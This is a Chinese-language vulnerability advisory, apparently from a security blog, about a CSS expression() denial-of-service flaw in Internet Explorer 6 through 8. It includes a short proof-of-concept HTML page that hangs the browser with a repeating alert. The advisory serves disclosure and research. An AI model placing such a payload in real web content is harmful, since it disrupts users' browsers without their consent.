Microsoft IE CSS expression处理拒绝服务漏洞

受影响系统:

Microsoft Internet Explorer 8.0
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0

描述:


BUGTRAQ  ID: 40487

Internet Explorer是Windows操作系统中默认捆绑的web浏览器。

Internet Explorer没有正确地处理级联样式表单中的expression,可能导致浏览器无法正常工作。

<*来源:MustLive (mustlive@websecurity.com.ua
  
  链接:http://marc.info/?l=bugtraq&m=125778617727776&w=2
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head>
<title>Internet Explorer DoS Exploit (C) 2008 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<p style="dos:expression(alert(‘DoS’))">IE DoS</p>
</body>
</html>

建议:


厂商补丁:

Microsoft
———
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

发表评论?

0 条评论。

发表评论